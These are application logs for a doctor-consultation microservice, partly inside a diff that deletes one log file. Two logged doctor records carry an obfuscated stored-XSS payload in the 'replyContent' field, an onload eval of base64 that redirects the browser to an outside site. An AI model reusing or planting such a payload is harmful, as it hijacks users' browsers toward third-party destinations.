20:13:05.569 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f64760
20:13:05.570 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
20:13:05.570 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
20:13:05.576 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:13:06.810 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698408786237_10.100.1.1_62559
20:13:06.810 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Notify connected event to listeners.
20:13:06.811 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:13:06.811 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6420
20:13:07.024 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
20:13:08.773 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
20:13:08.774 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
20:13:08.774 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
20:13:08.918 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
20:13:11.966 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
20:13:11.967 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
20:13:11.967 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
20:13:12.792 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
20:13:14.340 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 7a019d10-910e-4ab6-b5ea-f8051e85535d
20:13:14.340 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] RpcClient init label, labels = {module=naming, source=sdk}
20:13:14.342 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
20:13:14.342 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
20:13:14.342 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
20:13:14.342 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:13:14.574 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698408794051_10.100.1.1_62572
20:13:14.574 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:13:14.574 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Notify connected event to listeners.
20:13:14.574 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6420
20:13:17.743 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
20:13:17.799 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
20:13:18.325 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Receive server push request, request = NotifySubscriberRequest, requestId = 1864
20:13:18.327 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7a019d10-910e-4ab6-b5ea-f8051e85535d] Ack server push request, request = NotifySubscriberRequest, requestId = 1864
20:13:19.234 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.262 seconds (JVM running for 18.12)
20:13:19.242 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
20:13:19.243 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
20:13:19.244 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
20:13:19.454 [RMI TCP Connection(5)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
20:13:33.534 [http-nio-10009-exec-1] INFO c.g.d.c.DoctorController - [doctorFind,96] - 功能:回显医生信息 URI:/doctor/doctorFind/1 方法POST 参数:{"consultationPrice":"400.00","departmentId":3,"doctorCareer":"科室主任","doctorField":"新生儿黄痘,肺炎,脑膜炎,呼吸窗迫,新生儿贫血,肺动脉高压等各种新生儿重症的诊断及治疗,掌掘各种呼吸机使用,气管播管。心肺复苏等技术。","doctorHospital":"十堰协和医院","doctorId":1,"doctorName":"张三","doctorPicture":"","personalProfile":"2006年就读广州医学院医学研究生新生儿专业。导师为广东省妇幼保健院张晓庄院长,2009年顺利毕业并就职于广东省好幼保健院新生儿科重症监护室(ICu)。于2011年晋升为主治医师。2014年晋升为副主任医师并于同年共座华南大学医字博士。","replyContent":"<body/onload=e&#x76;&#x61;l&#x28;a&#x74;&#x6f;b&#x28;&#34;d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp&#34;&#x29;&#x29;>","replyStatus":2,"userId":1}
22:40:57.782 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
22:40:57.827 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
22:40:58.157 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
22:40:58.157 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@2af76221[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
22:40:58.157 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698408794051_10.100.1.1_62572
22:40:58.162 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@46a235ea[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 1777]
22:40:58.303 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
22:40:58.307 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
22:40:58.315 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
22:40:58.315 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye

View File

@ -1,98 +0,0 @@
13:56:48.202 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
13:56:50.033 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0
13:56:50.093 [main] INFO o.r.Reflections - [scan,232] - Reflections took 29 ms to scan 1 urls, producing 3 keys and 6 values
13:56:50.120 [main] INFO o.r.Reflections - [scan,232] - Reflections took 9 ms to scan 1 urls, producing 4 keys and 9 values
13:56:50.135 [main] INFO o.r.Reflections - [scan,232] - Reflections took 14 ms to scan 1 urls, producing 3 keys and 10 values
13:56:50.143 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
13:56:50.150 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
13:56:50.158 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
13:56:50.160 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
13:56:50.161 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f64550
13:56:50.161 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f64760
13:56:50.161 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
13:56:50.162 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
13:56:50.167 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
13:56:53.906 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
13:56:56.912 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
13:56:59.925 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Try to reconnect to a new server, server is not appointed, will choose a random server.
13:56:59.925 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
13:56:59.925 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010aa378
13:57:01.286 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
13:57:03.466 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
13:57:03.466 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
13:57:03.466 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
13:57:03.630 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
13:57:06.046 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Fail to connect server, after trying 1 times, last try server is {serverIp = '10.100.1.3', server main port = 8848}, error = unknown
13:57:09.259 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Fail to connect server, after trying 2 times, last try server is {serverIp = '10.100.1.3', server main port = 8848}, error = unknown
13:57:12.590 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Fail to connect server, after trying 3 times, last try server is {serverIp = '10.100.1.3', server main port = 8848}, error = unknown
13:57:16.013 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Fail to connect server, after trying 4 times, last try server is {serverIp = '10.100.1.3', server main port = 8848}, error = unknown
13:57:19.521 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Fail to connect server, after trying 5 times, last try server is {serverIp = '10.100.1.3', server main port = 8848}, error = unknown
13:57:23.142 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0e32eace-0df6-4acb-8c18-fa3df8b8d46b_config-0] Fail to connect server, after trying 6 times, last try server is {serverIp = '10.100.1.3', server main port = 8848}, error = unknown
13:57:25.185 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
13:57:25.210 [main] INFO o.a.c.c.StandardService - [log,173] - Stopping service [Tomcat]
13:59:22.844 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
13:59:24.636 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0
13:59:24.683 [main] INFO o.r.Reflections - [scan,232] - Reflections took 24 ms to scan 1 urls, producing 3 keys and 6 values
13:59:24.706 [main] INFO o.r.Reflections - [scan,232] - Reflections took 11 ms to scan 1 urls, producing 4 keys and 9 values
13:59:24.728 [main] INFO o.r.Reflections - [scan,232] - Reflections took 19 ms to scan 1 urls, producing 3 keys and 10 values
13:59:24.735 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
13:59:24.744 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 1 keys and 7 values
13:59:24.751 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
13:59:24.754 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
13:59:24.754 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f639b8
13:59:24.755 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f63bc8
13:59:24.755 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
13:59:24.755 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
13:59:24.762 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
13:59:26.037 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698472764506_10.100.1.1_63282
13:59:26.037 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Notify connected event to listeners.
13:59:26.038 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
13:59:26.038 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [d4a5129a-4d57-4612-8195-a0cee8e85c41_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
13:59:26.257 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
13:59:28.278 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
13:59:28.279 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
13:59:28.279 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
13:59:28.429 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
13:59:31.672 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
13:59:31.674 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
13:59:31.674 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
13:59:32.705 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
13:59:34.335 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a
13:59:34.336 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] RpcClient init label, labels = {module=naming, source=sdk}
13:59:34.337 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
13:59:34.337 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
13:59:34.337 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
13:59:34.338 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
13:59:34.579 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698472773104_10.100.1.1_63329
13:59:34.580 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
13:59:34.580 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Notify connected event to listeners.
13:59:34.580 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
13:59:38.058 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
13:59:38.121 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
13:59:38.629 [nacos-grpc-client-executor-7] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Receive server push request, request = NotifySubscriberRequest, requestId = 2305
13:59:38.632 [nacos-grpc-client-executor-7] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Ack server push request, request = NotifySubscriberRequest, requestId = 2305
13:59:39.617 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 18.56 seconds (JVM running for 19.542)
13:59:39.628 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
13:59:39.629 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
13:59:39.630 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
13:59:39.982 [RMI TCP Connection(3)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
14:01:03.029 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Server healthy check fail, currentConnection = 1698472773104_10.100.1.1_63329
14:01:03.029 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Try to reconnect to a new server, server is not appointed, will choose a random server.
14:01:03.277 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Success to connect a server [10.100.1.3:8848], connectionId = 1698472861795_10.100.1.1_63675
14:01:03.278 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Abandon prev connection, server is 10.100.1.3:8848, connectionId is 1698472773104_10.100.1.1_63329
14:01:03.278 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698472773104_10.100.1.1_63329
14:01:03.282 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Notify disconnected event to listeners
14:01:03.284 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Notify connected event to listeners.
14:01:05.210 [nacos-grpc-client-executor-39] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Receive server push request, request = NotifySubscriberRequest, requestId = 2308
14:01:05.211 [nacos-grpc-client-executor-39] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [bf073052-7ac2-4cbd-baaf-6a0a8a9ec40a] Ack server push request, request = NotifySubscriberRequest, requestId = 2308
14:01:20.506 [http-nio-10009-exec-1] INFO c.g.d.c.DoctorController - [doctorList,41] - 功能:医生信息 URI:/doctor/doctorList 方法POST 参数:[{"consultationPrice":400,"departmentId":3,"doctorCareer":"科室主任","doctorField":"新生儿黄痘,肺炎,脑膜炎,呼吸窗迫,新生儿贫血,肺动脉高压等各种新生儿重症的诊断及治疗,掌掘各种呼吸机使用,气管播管。心肺复苏等技术。","doctorHospital":"十堰协和医院","doctorId":1,"doctorName":"张三","doctorPicture":"","personalProfile":"2006年就读广州医学院医学研究生新生儿专业。导师为广东省妇幼保健院张晓庄院长,2009年顺利毕业并就职于广东省好幼保健院新生儿科重症监护室(ICu)。于2011年晋升为主治医师。2014年晋升为副主任医师并于同年共座华南大学医字博士。","replyContent":"<body/onload=e&#x76;&#x61;l&#x28;a&#x74;&#x6f;b&#x28;&#34;d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp&#34;&#x29;&#x29;>","replyStatus":2,"userId":1},{"consultationPrice":1,"departmentId":1,"doctorCareer":"","doctorField":"","doctorGender":1,"doctorHospital":"","doctorId":3,"doctorName":"王林涛","doctorPicture":"","personalProfile":"","replyContent":"","replyStatus":1,"userId":1}]
14:01:58.397 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
14:01:58.437 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
14:01:58.768 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
14:01:58.768 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@41fe722c[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
14:01:58.768 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698472861795_10.100.1.1_63675
14:01:58.769 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@73733071[Running, pool size = 3, active threads = 0, queued tasks = 0, completed tasks = 52]
14:01:58.899 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
14:01:58.901 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
14:01:58.905 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
14:01:58.906 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye